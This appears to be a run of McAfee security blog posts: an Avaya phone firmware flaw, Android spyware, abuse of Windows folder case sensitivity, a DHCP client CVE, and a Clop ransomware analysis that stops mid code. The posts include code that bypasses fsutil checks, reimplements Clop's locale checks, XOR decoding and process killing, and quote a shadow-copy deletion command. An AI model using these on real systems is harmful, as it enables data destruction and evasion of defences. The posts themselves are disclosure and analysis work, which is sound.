The video below demonstrates how an attacker can leverage this bug to take over the normal operation of the phone, exfiltrate audio from its speaker phone, and potentially “bug” the phone. The current attack is conducted with the phone directly connected to an attacker’s laptop but would also work via a connection to the same network as a vulnerable phone. The full technical details can be found here, while the rest of this article will give a high-level overview on how this bug was found and some consideration regarding its resolution. The firmware image Avaya published on June 25th resolves the issue and can be found here. As a user, you can verify if your Deskphone is vulnerable: first determine if you have one of the affected models (9600 Series, J100 Series or B189), then you can find which firmware version your phone is using in the “About Avaya IP Deskphone” screen under the Home menu, version 6.8.1 and earlier are vulnerable when using a H.323 firmware (SIP versions are not affected).

What are Researchers Looking for?

When studying the security of embedded and IoT devices, researchers generally have a couple of goals in mind to help kickstart their research. In most cases, two of the main targets are recovering the files on the system so as to study how the device functions, and then finding a way to interact directly with the system in a privileged fashion (beyond what a normal user should be able to do). The two can be intertwined, for instance getting a privileged access to the system can enable a researcher to recover the files stored on it, while recovering the files first can show how to enable a privileged access.

In this case, recovering the files was straightforward, but gaining a privileged access required a little more patience.

Recovering the Files From the Phone

When we say recovering the files from the phone, we mean looking for the operating system and the various pieces of software running on it. User files, e.g. contacts, settings and call logs, are usually not of interest to a security researcher and will not be covered here. To recover the files, the easiest approach is to look for firmware updates for the device. If we are lucky, they will be freely available and not encrypted. In most cases, an encrypted firmware does not increase the security of the system but rather raises the barrier of entry for security researchers and attackers alike. In this case, we are in luck, Avaya’s website serves firmware updates for its various phone product lines and anyone can download them. The download contains multiple tar files (a type of archive file format). We can then run a tool called binwalk on the extracted files. Binwalk is a large dictionary of patterns that represents known file formats; given an unknown firmware file, it will look for any known pattern and, upon finding potential matches, will attempt to process them accordingly. For instance, if it finds what looks like a .zip file inside the firmware, it will try to unzip it. Running this tool is always a good first step when facing an unknown firmware file as, in most cases, it will identify useful items for you.

When processing the phone’s firmware, extracting the files and running binwalk on them gave us the program the phone runs at startup (the bootloader), the Linux kernel used by the phone, and a JFFS filesystem that contains all the phone’s binaries and configuration files. This is a great start, as from there we can start understanding the inner workings of the device and look for bugs.  At this stage however, we are limited to performing a static analysis: we can look at the files and peek at the assembly instructions of various binaries, but we cannot execute them. To make life easier, there are usually two options. The first one is to emulate the whole phone, or at least some region of interest, while the other is to get a privileged access to the system, to inspect what is running on it as well as run debugging tools. Best results come when you mix and match all these options appropriately. For the sake of simplicity, we will only cover the latter, but both were used in various ways to help us in our research.

Getting the Privileged Access

In most cases, when talking about gaining privileged access to an IoT/embedded device, security researchers are on the lookout for an administrative interface called a root shell that lets them execute any code they want with the highest level of privilege. Sometimes, one is readily available for maintenance purposes; other times more effort is required to gain access to it, assuming one is present in the first place. This is when hardware hacking comes into play; security researchers love to rip open devices and void warranties, looking for potential debug ports, gatekeepers of the sought-after privileged access.

Close up of the phone’s circuit board. UART ports in Red and the EEPROM in blue

In the picture above, we can see two debug ports labeled UART0 and UART1. This type of test point, where the copper is directly exposed, is commonly used during the manufacturing process to program the device or verify everything is working properly. UART stands for Universal Asynchronous Receiver-Transmitter and is meant for two-way communication. This is the most likely place where we can find the administrative access we are looking for. By buying a $15 cable that converts UART to USB and soldering wires onto the test pads, we can see debug information being printed on screen when the phone boots up, but soon the flow of debug information dries up. This is a curious behavior—why stop the debug messages?—so we need to investigate more. By using a disassembler to convert raw bytes into computer instructions, we can peek into the code of the bootloader recovered earlier and find out that during the boot process the phone fetches settings from external memory to decide whether the full set of debug features should be enabled on the serial console. The external memory is called an EEPROM and is easily identifiable on the board, first by its shape and then by the label printed on it. Labels on electronic components are used to identify them and to retrieve their associated datasheet, the technical documentation describing how to use the chip from an electrical engineering standpoint. Soldering wires directly to the chip under a microscope, and connecting it to a programmer (a $30 gizmo called a buspirate), allows us to change the configuration stored on it and enable the debug capabilities of the phone.

EEPROM ready to be re-programmed

Rebooting the phones gives us much more debug information and, eventually, we are greeted with the root shell we were after.

Confirmation we have a root shell. Unrelated debug messages are being printed while we are invoking the “whoami” command

Alternative Roads

The approach described above is fairly lengthy and is only interesting to security researchers in a similar situation. A more generic technique would be to directly modify the filesystem by altering the flash storage (a NAND Flash on the back of the circuit board) as we did for previous research, and then automatically start an SSH server or a remote shell. Another common technique is to tamper with the NAND flash while the filesystem is loading in memory, to get the bootloader in an exception state that will then allow the researcher to modify the boot arguments of the Linux kernel. Otherwise, to get remote shell access, using an older firmware with known RCE vulnerabilities is probably the easiest method to consider; it can be a good starting point for security researchers and is not threatening to regular users as they should already have the most up-to-date software. All things considered, these methods are not a risk to end-users and are more of a stepping stone for security researchers to conduct their research.

In Search of Vulnerabilities

After gaining access to a root shell and the ability to reverse engineer the files on the phone, we are faced with the open-ended task of looking for potentially vulnerable software. As the phone runs Linux, the usual command line utilities people use for administering Linux systems are readily available to us. It is natural to look at the list of running processes, find the ones with network connections, and so forth. While poking around, it becomes clear that one of the utilities, dhclient, is of great interest. It is already running on the system and handles network configuration (the so-called DHCP requests to configure the phone’s IP address). If we invoke it in the command line, the following is printed:

Showing a detailed help screen describing its expected arguments is normal behavior, but a 2004-2007 copyright is a big red flag. A quick search confirms that the 4.0.0 version is more than 10 years old and, even worse, an exploit targeting it is publicly available. Dhclient code is open source, so finding the differences between two successive versions is straightforward. Studying the exploit code and how the bug was patched helps us to narrow down which part of the code could be vulnerable. By once again using a disassembler, we confirm the phone’s version of dhclient is indeed vulnerable to the bug reported in 2009. Converting the original exploit to make it work on the phone requires a day or two of work, while building the proof of concept demonstrated in the above video is a matter of mere hours. Indeed, all the tools to stream audio from the phone to a separate machine are already present on the system, which greatly reduces the effort to create this demo. We did not push the exploitation further than the Proof of Concept shown in the above video, but we can assume that at this point, building a weaponized version able to threaten private networks is more of a software engineering task and a skilled attacker might only need a few weeks, if not days, to put one together.
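The underlying flaw falls into a well-known bug class: copying a DHCP option value into a fixed-size buffer while trusting the attacker-supplied length byte. The fragment below is a conceptual sketch of that pattern, not dhclient’s actual code.

/*
 * Conceptual illustration of the bug class: a DHCP option value copied
 * into a fixed-size buffer using the attacker-supplied length field.
 * This is NOT dhclient's actual code, just the general vulnerable pattern.
 */
#include <string.h>

struct dhcp_option {
    unsigned char code;         /* e.g. 1 = subnet mask */
    unsigned char len;          /* attacker-controlled  */
    const unsigned char *data;
};

void handle_subnet_mask(const struct dhcp_option *opt)
{
    unsigned char mask[4];

    /* Vulnerable: trusts opt->len instead of capping it at sizeof(mask). */
    memcpy(mask, opt->data, opt->len);

    /* A fixed variant would clamp the copy:
     * memcpy(mask, opt->data, opt->len > sizeof(mask) ? sizeof(mask) : opt->len);
     */
    (void)mask;
}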

Remediation

Upon finding the flaw, we immediately notified Avaya with detailed instructions on how to reproduce the bug and suggested fixes. They were able to fix, test and release a patched firmware image in approximately two months. At the time of publication, the fix will have been out for more than 30 days, leaving IT administrators ample time to deploy the new image. In a large enterprise setting, it is pretty common to first have a testing phase where a new image is being deployed to selected devices to ensure no conflict arises from the deployment. This explains why the timeline from the patch release to deployment to the whole fleet may take longer than what is typical in consumer grade software.

Conclusion

IoT and embedded devices tend to blend into our environment, in some cases not warranting a second thought about the security and privacy risks they pose. In this case, with a minimal hardware investment and free software, we were able to uncover a critical bug that remained out-of-sight for more than a decade. Avaya was prompt to fix the problem and the threat this bug poses is now mitigated, but it is important to realize this is not an isolated case and many devices across multiple industries still run legacy code more than a decade old. From a system administration perspective, it is important to consider all these networked devices as tiny black-box computers running unmanaged code which should be isolated and monitored accordingly. The McAfee Network Security Platform (NSP) detects this attack as “DHCP: Subnet Mask Option Length Overflow” (signature ID: 0x42601100), ensuring our customers remain protected. Finally, for the technology enthusiasts reading this, the barrier of entry to hardware hacking has never been this low, with plenty of online resources and cheap hardware to get started. Looking for this type of vulnerability is a great entry point to information security and will help make the embedded world a safer place.

The post Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware appeared first on McAfee Blogs.

MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play

The McAfee mobile research team has found a new type of Android malware for the MoqHao phishing campaign (a.k.a. XLoader and Roaming Mantis) targeting Korean and Japanese users. A series of attack campaigns are still active, mainly targeting Japanese users. The new spyware has very different payloads from the existing MoqHao samples. However, we found evidence of a connection between the distribution method used for the existing campaign and this new spyware. All the spyware we found this time pretends to be security applications targeting users in Japan and Korea. We discovered a phishing page related to a DNS hijacking attack, designed to trick the user into installing the new spyware, distributed on the Google Play store.

Fake Japanese Security Apps Distributed on Google Play

We found two fake Japanese security applications. The package names are com.jshop.test and com.jptest.tools2019. These packages were distributed on the Google Play store. The number of downloads of these applications was very low. Fortunately, the spyware apps had been immediately removed from the Google Play store, so we acquired the malicious samples thanks to the Google Android Security team.

Figure 1. Fake security applications distributed on Google Play

This Japanese spyware has four command and control functions. Below is the server command list used with this spyware. The spyware attempts to collect device information, such as the IMEI and phone number, and to steal SMS/MMS messages on the device. These malicious commands are sent via the Tencent Push Notification Service.

Figure 2. Command registration into mCommandReceiver

Table 1. The command lists

*1 Not implemented correctly due to the difference from the functionality guessed from the command name

We believe that the cybercriminal included minimal spyware features to bypass Google’s security checks to distribute the spyware on the Google Play store, perhaps with the intention of adding additional functionality in future updates, once approved.

Fake Korean Police Apps

Following further investigation, we found other samples very similar to the above fake Japanese security applications, this time targeting Korean users. A fake Korean police application disguised itself as an anti-spyware application. It was distributed with a filename of cyber.apk on a host server in Taiwan (that host has previously been associated with malicious phishing domains impersonating famous Japanese companies). It used the official icon of the Korean police application and a package name containing ‘kpo’, along with references to com.kpo.scan and com.kpo.help, all of which relate to the Korean police.

Figure 3. This Korean police application icon was misappropriated

The Trojanized package was obfuscated with the Tencent packer to hide its malicious spyware payload. Unlike the existing MoqHao samples, which hide and access the control server address via Twitter accounts, this sample has the C&C server address simply embedded in the application.

The malware has very similar spyware functionality to the fake Japanese security application. However, this one features many additional commands compared to the Japanese one. Interestingly, the Tencent Push Service is used to issue commands to the infected user.

Figure 4. Tencent Push Service

The code and table below show characteristics of the server command and content list.

Figure 5. Command registration into mCommandReceiver

Table 2. The command lists

*1 Seems to be under construction due to the difference from the functionality guessed from the command name

There are several interesting functions implemented in this spyware. To place automated phone calls through the default calling application, the KAutoService class checks the content of the active window and automatically clicks the start-call button.

Figure 6. KAutoService class automatically clicks the start button in the active calling application

Another interesting function attempts to disable anti-spam call applications (e.g. whowho – Caller ID & Block), which warn users about suspicious incoming calls from unknown numbers. Disabling these call-security applications allows cybercriminals to place calls without arousing suspicion, since no alert is issued by the anti-spam call apps, increasing the likelihood of successful social engineering.

Figure 7. Disable anti-spam-call applications

Figure 8. Disable anti-spam-call applications

Table 3. List of disabled anti-spam call applications

Connection with Active MoqHao Campaigns

The malware characteristics and structures are very different from the existing MoqHao samples. We give special thanks to @ZeroCERT and @ninoseki, without whom we could not have identified the connection to the active MoqHao attack and DNS hijacking campaigns. The server script on the phishing website hosting the fake Chrome application leads victims to a fake Japanese security application on the Google Play store (https://play.google.com/store/apps/details?id=com.jptest.tools2019) under specific browser conditions.

Figure 9. The server script redirects users to a fake security application on Google Play (Source: @ninoseki)

There is a strong correlation between the fake Japanese and Korean applications we found this time: they share common spy commands and the same crash report key on a cloud service. Therefore, we concluded that both pieces of spyware are connected to the ongoing MoqHao campaigns.

Conclusion

We believe that the spyware aims to masquerade as a security application and perform spy activities, such as tracking device location and eavesdropping on call conversations. It is distributed via an official application store that many users trust. The attack campaign is still ongoing, and it now features a new Android spyware that has been created by the cybercriminals. McAfee is working with Japanese law enforcement agencies to help with the takedown of the attack campaign. To protect your privacy and keep your data from cyber-attacks, please do not install apps from outside of official application stores. Keep firmware up to date on your device and make sure to protect it from malicious apps by installing security software on it.

McAfee Mobile Security detects this threat as Android/SpyAgent and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Appendix – IOCs

Table 4. Fake Japanese security application IOCs

Table 5. Fake Korean police application IOCs

The post MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play appeared first on McAfee Blogs.

The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land

In the first of this 3-part blog series, we covered the implications of promoting files to “Evil Twins” where they can be created and remain in the system as different entities once case sensitiveness is enabled.

In this second post, we try to abuse applications that do not handle CS changes well, exploiting years of “normalization” assumptions.

It is worth noting that the impact of this change will vary depending on the target folder.

Out of the box, Windows provides a tool (fsutil.exe) to change CS information by invoking the underlying native API NtSetInformationFile with the FileCaseSensitiveInformation information class.

This tool contains several checks at user-mode level to restrict the target folder but, as usual, it can be easily bypassed using different path combinations. It is possible to create a tool or invoke the API from PowerShell to remove these checks.
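One way such a tool might call the native API directly is sketched below; the information-class value (71) and the structure layout follow publicly documented headers and should be treated as assumptions for illustration, as should the target path.

/*
 * Minimal sketch of toggling per-directory case sensitivity by calling
 * NtSetInformationFile directly (bypassing fsutil's user-mode path checks).
 * The information class value (71) and the structure layout are assumptions
 * based on publicly documented headers.
 */
#include <windows.h>
#include <winternl.h>
#include <stdio.h>

typedef struct _MY_FILE_CASE_SENSITIVE_INFORMATION {
    ULONG Flags;                                /* 0x1 = case-sensitive directory */
} MY_FILE_CASE_SENSITIVE_INFORMATION;

typedef NTSTATUS (NTAPI *NtSetInformationFile_t)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, ULONG);

int main(void)
{
    /* Hypothetical target directory. */
    HANDLE dir = CreateFileW(L"\\\\?\\C:\\target_dir", GENERIC_READ | GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                             FILE_FLAG_BACKUP_SEMANTICS, NULL);
    if (dir == INVALID_HANDLE_VALUE) { printf("CreateFileW failed: %lu\n", GetLastError()); return 1; }

    NtSetInformationFile_t pNtSetInformationFile =
        (NtSetInformationFile_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtSetInformationFile");

    IO_STATUS_BLOCK iosb;
    MY_FILE_CASE_SENSITIVE_INFORMATION info = { 1 };    /* enable case sensitivity */
    NTSTATUS status = pNtSetInformationFile(dir, &iosb, &info, sizeof(info),
                                            71 /* FileCaseSensitiveInformation (assumed) */);
    printf("NtSetInformationFile returned 0x%08lX\n", (unsigned long)status);

    CloseHandle(dir);
    return 0;
}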

Let us go over the following scenarios:

  • Changing ROOT drive CS:
    1. fsutil restrictions will be bypassed, and most console commands will not work unless you specify full paths (mostly because environment variables break under case sensitivity).

  • Combinations to bypass this check include:
    • \\?\C:\ (by drive letter with long path)
    • \\.\BootPartition\\  (by partition)
    • \\?\Volume{3fb4edf7-edf1-4083-84f8-7fbca215bfee}\ (volume id)
  • Change “protected folders” CS.
    1. For some folders is not enough to be Administrator, but to have other type of ACL’s instead.
    2. TrustedInstaller has the required permissions to do so and… you just need Admin permissions to change the service path:

If you change the Windows folder’s case sensitiveness using the same technique, Windows will no longer boot.

These scenarios introduce new, unexpected behaviors in current applications, for instance:

  • There is a folder with CS enabled containing two directories with the same name but different case.
  • Trying to change CS will fail due to the “multiple files/folders with the same name already exist” check.
  • Move one of the twin folders to the recycle bin.
  • Change the CS of the folder.
  • Restore the deleted folder.
  • The contents of the restored folder overwrite the one originally kept.

Screenshots

Left: Root drive with case sensitive enabled.

Right: Program Files CS changed thanks to the TrustedInstaller ACL. If an application does not consider the proper case, the next time it tries to execute a binary whose name has been normalized (e.g. to uppercase) it can spawn a different application.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Protection and Detection with McAfee Products

  • Products that rely on SysCore will protect C:\ from case sensitive changes
  • Endpoint Security Expert Rules
  • Active Response:
    • Create a custom collector to query case sensitiveness of important folders.
    • Search for fsutil executions (or even History Processes if that collector is part of your Active Response version)
      • “Processes where Processes name equals fsutil.exe”
  • MVISION EDR:
    • Realtime search
      • “Processes where Processes name equals fsutil.exe”
    • Search for fsutil execution in the historical view

Artifacts involved:

  • NT attributes change
  • Fsutil execution
  • Trusted Installer service changes

Outcomes for this technique include:

  • A piece of ransomware could create a C:\Windows\SYSTEM32 twin folder and cause a BSOD on the next restart
  • The DLL being loaded could be changed, or an application could be prevented from starting

The post The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land appeared first on McAfee Blogs.

DHCP Client Remote Code Execution Vulnerability Demystified

CVE-2019-0547

CVE-2019-0547 was the first vulnerability patched by Microsoft this year. The dynamic link library, dhcpcore.dll, which is responsible for DHCP client services in a system, is vulnerable to malicious DHCP reply packets.

This vulnerability allows remote code execution if the user tries to connect to a network with a rogue DHCP Server, hence making it a critical vulnerability.

DHCP protocol overview

DHCP is a client-server protocol used to dynamically assign IP addresses when a computer connects to a network. The DHCP server listens on port 67 and is responsible for distributing IP addresses to DHCP clients and allocating TCP/IP configuration to endpoints.

The DHCP handshake is represented below:

During DHCP Offer and DHCP Ack, the packet contains all the TCP/IP configuration information required for a client to join the network. The structure of a DHCP Ack packet is shown below:

The options field holds several parameters required for basic DHCP operation. One of the options in the Options field is Domain Search (type field is 119).

Domain Search Option field (RFC 3397)

This option is passed along with OFFER and ACK packets to the client to specify the domain search list used when resolving hostnames using DNS. The format of the DHCP option field is as follows:

To allow the search list to be encoded compactly, the search strings are concatenated and encoded using the DNS name format.

A list of domain names, such as www.example.com and dns.example.com, is encoded as follows:
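For illustration, here is a minimal sketch of that encoding, assuming the plain RFC 1035 label format (one length octet per label, terminated by a zero octet) and ignoring the optional compression pointers that RFC 3397 also permits:

   # Sketch: encode a DHCP option 119 (Domain Search) payload, without compression.
   def encode_domain(name: str) -> bytes:
       out = bytearray()
       for label in name.rstrip(".").split("."):
           raw = label.encode("ascii")
           out.append(len(raw))   # one length octet per label
           out += raw
       out.append(0)              # root label terminates the name
       return bytes(out)

   def encode_search_list(domains) -> bytes:
       return b"".join(encode_domain(d) for d in domains)

   encoded = encode_search_list(["www.example.com", "dns.example.com"])
   print(encoded.hex())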

Vulnerability

There is a vulnerability in the DecodeDomainSearchListData function of dhcpcore.dll.

The DecodeDomainSearchListData function decodes the encoded search list option field value. While decoding, the function calculates the length of the decoded domain name list, allocates memory for it, and copies the decoded list into that allocation.

A malicious server can craft an encoded search list such that, when the DecodeDomainSearchListData function decodes it, the resulting length is zero. This leads to a HeapAlloc call for zero bytes and, subsequently, to an out-of-bounds write.

Patch

The patch includes a check which ensures the size argument to HeapAlloc is not zero. If zero, the function exits.
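The following is a simplified conceptual model, not the dhcpcore.dll code, of why a zero decoded length is dangerous and of the kind of size check the patch adds. The single-null-byte input is only one illustrative way the computed length can end up at zero.

   # Conceptual model of the decode-length calculation and the patched guard.
   def decoded_length(option_data: bytes) -> int:
       """Walk the label-encoded names and count the decoded text length."""
       length, i = 0, 0
       while i < len(option_data):
           label_len = option_data[i]
           i += 1
           if label_len == 0:          # end of one domain name
               continue
           length += label_len + 1     # label plus a separating dot
           i += label_len
       return length

   malicious = b"\x00"                 # an empty (root) name decodes to nothing
   size = decoded_length(malicious)
   if size == 0:                       # patched behaviour: refuse a zero-sized allocation
       raise ValueError("decoded search list is empty; refusing to allocate zero bytes")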

Conclusion

A rogue DHCP server in the network can exploit this vulnerability by replying to DHCP requests from clients. The rogue DHCP server can also be a wireless access point to which a user connects. Successful exploitation of this vulnerability can trigger code execution on the client and allow an attacker to take control of the system.

McAfee NSP customers are protected from this attack by signature “0x42602000”.

The post DHCP Client Remote Code Execution Vulnerability Demystified appeared first on McAfee Blogs.

Clop Ransomware

This new ransomware was discovered by Michael Gillespie on 8 February 2019 and it is still improving over time. This blog will explain the technical details and share information about how this new ransomware family works. There are some variants of the Clop ransomware but in this report we will focus on the main version and highlight some of those variations. The main goal of Clop is to encrypt all files in an enterprise and request a payment to receive a decryptor to decrypt all the affected files. To achieve this, we observed some new techniques being used by the author that we have not seen before. Clearly, over the last few months, we have seen more innovative techniques appearing in ransomware.

Clop Overview

The Clop ransomware is usually packed to hide its inner workings. The sample we analyzed was also signed with the following certificate in the first version (now revoked):

FIGURE 1. Packer signed to avoid av programs and mislead the user

Signing a malicious binary, in this case ransomware, may trick security solutions into trusting the binary and letting it pass. Although this initial certificate was revoked within a few days, another version appeared soon after with another certificate:

FIGURE 2. New certificate in new version

This sample was discovered by MalwareHunterTeam (https://twitter.com/malwrhunterteam) on the 26 February, 2019.

We discovered the following Clop ransomware samples which were signed with a certificate:

This malware is prepared to avoid running under certain conditions; for example, in the first version it requests to be installed as a service and, if that does not succeed, it will terminate itself.

The malware’s first action is to compare the keyboard layout of the victim’s computer, obtained with the function “GetKeyboardLayout”, against hardcoded values.

This function returns the user keyboard input layout at the moment the malware calls the function.

The malware checks whether the layout value is greater than 0x0437 (Georgian), and makes some calculations against the Russian (0x0419) and Azerbaijani (0x082C) language identifiers. The function returns 1 if the layout belongs to Russia or another CIS country, and 0 in every other case.

FIGURE 3. Checking the keyboard layout

If the function returns 0, the malware continues with its normal flow; otherwise it gets the device context of the entire screen with the function “GetDC”. A second condition comes from the function “GetTextCharset”, which returns the character set of the font currently used by the system. If that value is 0xCC (RUSSIAN_CHARSET), the malware deletes itself from disk and terminates with “TerminateProcess”; if it is not this charset, it continues in the normal flow. This double check catches users with a multi-language system, i.e. users who have the Russian language installed but not active on the machine in an attempt to avoid this type of malware.

FIGURE 4. Check the text charset and compare with Russian charset
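The sketch below is a rough, Windows-only model of the two locale checks described above, built with the same APIs via ctypes; it is not Clop’s actual code, and the comparison against the layout values is simplified to a membership test for readability.

   # Rough model of the keyboard-layout and charset checks (Windows only).
   import ctypes

   RUSSIAN, AZERI, GEORGIAN = 0x0419, 0x082C, 0x0437
   RUSSIAN_CHARSET = 0xCC

   def looks_like_cis_system() -> bool:
       hkl = ctypes.windll.user32.GetKeyboardLayout(0)
       lang_id = hkl & 0xFFFF                      # low word is the language identifier
       if lang_id in (RUSSIAN, AZERI, GEORGIAN):
           return True
       hdc = ctypes.windll.user32.GetDC(0)         # device context of the entire screen
       try:
           return ctypes.windll.gdi32.GetTextCharset(hdc) == RUSSIAN_CHARSET
       finally:
           ctypes.windll.user32.ReleaseDC(0, hdc)

   print("CIS locale detected:", looks_like_cis_system())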

The code that is supposed to delete the ransomware from disk contains an error. It calls the system command prompt directly without waiting for the malware to finish. The command itself executes correctly but, because the malware is still running, its file is not deleted from disk. This happens because the author did not use a “timeout” command.

FIGURE 5. Deletion of the malware itself

The next action of the malware is to create a new thread that carries out all the subsequent work. With the handle of this thread, it waits an infinite amount of time for it to finish using the “WaitForSingleObject” function, then returns to the WinMain function and exits.

This thread’s first action is to create a file called “Favorite” in the same folder as the malware. Later, it will check the last error with “GetLastError” and, if the last error was 0,  it will wait with the function “Sleep” for 5 seconds.

Later, the thread makes a dummy call to the function “EraseTape” with a handle of 0, perhaps to disturb emulators because the handle is set to 0 in a hardcoded opcode, and then a call to the function “DefineDosDeviceA” with an invalid name that returns another error. These operations are repeated in a loop 666,000 times.

FIGURE 6. Loop to disturb the analysis

The next action is to search for some processes with these names:

  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If any of these processes is discovered, the malware waits 5 seconds using “Sleep” and then another 5 seconds before continuing with its normal flow. If these processes are not detected, it accesses its own resources and extracts the one named “OFFNESTOP1”. That resource is encrypted but contains a “.bat” file.

FIGURE 7. Access to the first resource crypted

The decryption is a simple XOR operation with bytes from this string:

“Po39NHfwik237690t34nkjhgbClopfdewquitr362DSRdqpnmbvzjkhgFD231ed76tgfvFAHGVSDqhjwgdyucvsbCdigr1326dvsaghjvehjGJHGHVdbas”.
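Assuming a straightforward repeating-key XOR with that string (the post describes it only as “a simple XOR operation with bytes from this string”), the decoding can be sketched as follows; the input bytes below are a placeholder round-trip, since the real input is the “OFFNESTOP1” resource extracted from the sample.

   # Sketch: repeating-key XOR with the key string quoted above.
   KEY = b"Po39NHfwik237690t34nkjhgbClopfdewquitr362DSRdqpnmbvzjkhgFD231ed76tgfvFAHGVSDqhjwgdyucvsbCdigr1326dvsaghjvehjGJHGHVdbas"

   def xor_crypt(data: bytes, key: bytes = KEY) -> bytes:
       # XOR each byte with the corresponding byte of the repeating key
       return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

   # Round trip with placeholder data (XOR is its own inverse)
   encrypted = xor_crypt(b"@echo off\r\nvssadmin Delete Shadows /all /quiet\r\n")
   print(xor_crypt(encrypted).decode())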

The next action is to write this batch file to the same folder where the malware resides, using the function “CreateFileA”. The file created has the name “clearsystems-11-11.bat”. The malware then launches it with “ShellExecuteA”, waits 5 seconds for it to finish, and deletes the file with the function “DeleteFileA”.

It is clear that the authors are not experienced programmers because they are using a .bat file for the next actions:

  • Delete the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).
  • Resize the shadow storage for all drives from C to H (hardcoded letters) to prevent the shadow volumes from being created again.
  • Use the bcdedit program to disable the recovery options in the boot of the machine and set it to ignore any boot failure instead of warning the user.

All these actions could have been performed in the malware code itself, without the need of an external file that can be detected and removed.

FIGURE 8. The BAT file to disable the shadow volumes and more security

The next action is to create a mutex with the hardcoded name “Fany—Fany—6-6-6”, then call the function “WaitForSingleObject” and compare the result with 0. If the value is 0, the mutex was created by this instance of the malware; any other value means the mutex was created by another instance or by a vaccine and, in that case, the malware terminates.

After this, it creates 2 threads: one to search for processes and another to encrypt files in the network shares it has access to.

The first thread enumerates all processes on the system, converts each process name to upper case, calculates a hash of the name with a custom algorithm and compares it against a large list of hashes. This is typical of malware that tries to hide which processes it is looking for. If it finds a match, it opens the process with the required rights using the “OpenProcess” function and terminates it with the “TerminateProcess” function.

The malware contains 61 hard-coded hashes of programs such as “STEAM.EXE”, database programs, office programs and others.
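The sketch below is only a conceptual model of that kill-list logic, not Clop’s code: placeholder_hash stands in for the custom 32-bit algorithm (which is not reproduced here), and the process names fed to it are illustrative. It enumerates processes via tasklist on Windows and only prints what would be terminated.

   # Conceptual model: uppercase the process name, hash it, compare to a blocklist.
   import subprocess

   def placeholder_hash(name: str) -> int:
       h = 0
       for ch in name.upper():
           h = (h * 31 + ord(ch)) & 0xFFFFFFFF   # stand-in 32-bit rolling hash
       return h

   KILL_HASHES = {placeholder_hash("STEAM.EXE"), placeholder_hash("MSACCESS.EXE")}

   def running_processes():
       out = subprocess.check_output(["tasklist", "/fo", "csv", "/nh"], text=True)
       for line in out.splitlines():
           if line.strip():
               yield line.split('","')[0].strip('"')   # first CSV field is the image name

   for proc in running_processes():
       if placeholder_hash(proc) in KILL_HASHES:
           print(f"would terminate {proc}")            # the malware calls OpenProcess/TerminateProcess here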

Below are the first 38 hashes with the associated process names. These 38 processes are the most common processes to close, as we have observed with other ransomware families such as GandCrab, Cerber, etc.

This thread runs in an infinite loop, waiting 30 minutes per iteration with the function “Sleep”.

FIGURE 9. Thread to kill critical processes to unlock files

The second thread has the task of enumerating all network shares and encrypting the files in them if the malware has access to them.

To execute this task, it uses the typical API functions of the “MPR.DLL” module:

  • WNetOpenEnumW
  • WNetEnumResourceW
  • WNetCloseEnum

This thread starts by reserving memory with the “GlobalAlloc” function to hold the information returned by the “MPR” functions.

For each network share that the malware discovers, it prepares to enumerate more shares and encrypt their files.

For each folder discovered, it will enter it and search for more subfolders and files. The first step is to check the name of the folder/file found against a hardcoded list of hashes with the same algorithm used to detect the processes to close.

Below are the results of 12 of the 27 hashes with the correct names:

If it passes, it will check that the file is not a folder, and in this case compare the name with a list of hardcoded names and extensions that are in plain text rather than in hash format:

  • ClopReadMe.txt
  • ntldr
  • NTDLR
  • boot.ini
  • BOOT.INI
  • ntuser.ini
  • NTUSER.INI
  • AUTOEXEC.BAT
  • autoexec.bat
  • .Clop
  • NTDETECT.COM
  • ntdetect.com
  • .dll
  • .DLL
  • .exe
  • .EXE
  • .sys
  • .SYS
  • .ocx
  • .OCX
  • .LNK
  • .lnk
  • desktop.ini
  • autorun.inf
  • ntuser.dat
  • iconcache.db
  • bootsect.bak
  • ntuser.dat.log
  • thumbs.db
  • DESKTOP.INI
  • AUTORUN.INF
  • NTUSER.DAT
  • ICONCACHE.DB
  • BOOTSECT.BAK
  • NTUSER.DATA.LOG
  • THUMBS.DB

This check is done with a custom function that compares character by character against the whole list. This is why the list contains the same names in both upper and lower case: instead of using a function such as “lstrcmpiA”, the author avoids any hook on that function that might prevent a file from being affected. Checking the extension at the same time makes the encryption process quicker. Naturally, the malware also checks that the file does not have the name of the ransom note or the extension it appends to encrypted files. Skipping these blacklisted names and extensions helps keep the system from crashing during encryption, in contrast with some other ransomware families.

FIGURE 10. Check of file names and extensions

This behavior is normal for ransomware, but the earlier check against hardcoded hashes of the file/folder name is odd because, as we can see in the picture above, the next check is made against plain text strings.

If the file passes this check, the malware creates a new thread with a struct containing a hardcoded key blob, the name of the file, and the path where the file exists. The first action in this thread is to set the error mode to 1 with “SetErrorMode” to avoid an error dialog being shown to the user if the malware crashes. It then builds the path to the file from the struct passed as an argument to the thread and changes the attributes of the file to ARCHIVE with the function “SetFileAttributesW”; however, the malware does not check whether this action succeeds.

It then generates a random AES key and encrypts the file with it. Next, it places the marker “Clop^_” at the end of the file and, after the marker, appends the AES key used to encrypt the file, itself encrypted with the master RSA key hardcoded in the malware to protect it against free third-party decryptors.

The malware can use 2 different public RSA keys: one exported with the crypto API as a public blob, or one embedded in base64 in the malware. It only uses the second one if it cannot create the crypto context or has some problem with the crypto API functions.
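To make the per-file layout described above more concrete, here is a minimal sketch using the third-party cryptography package. The choice of AES-CTR and PKCS#1 v1.5 padding is an assumption for illustration (the post does not state Clop’s exact mode or padding), and the key pair is generated locally only so the snippet is self-contained; in the real malware only the public key is embedded.

   # Sketch of the layout: encrypted body + "Clop^_" marker + RSA-wrapped AES key.
   import os
   from cryptography.hazmat.primitives.asymmetric import rsa, padding
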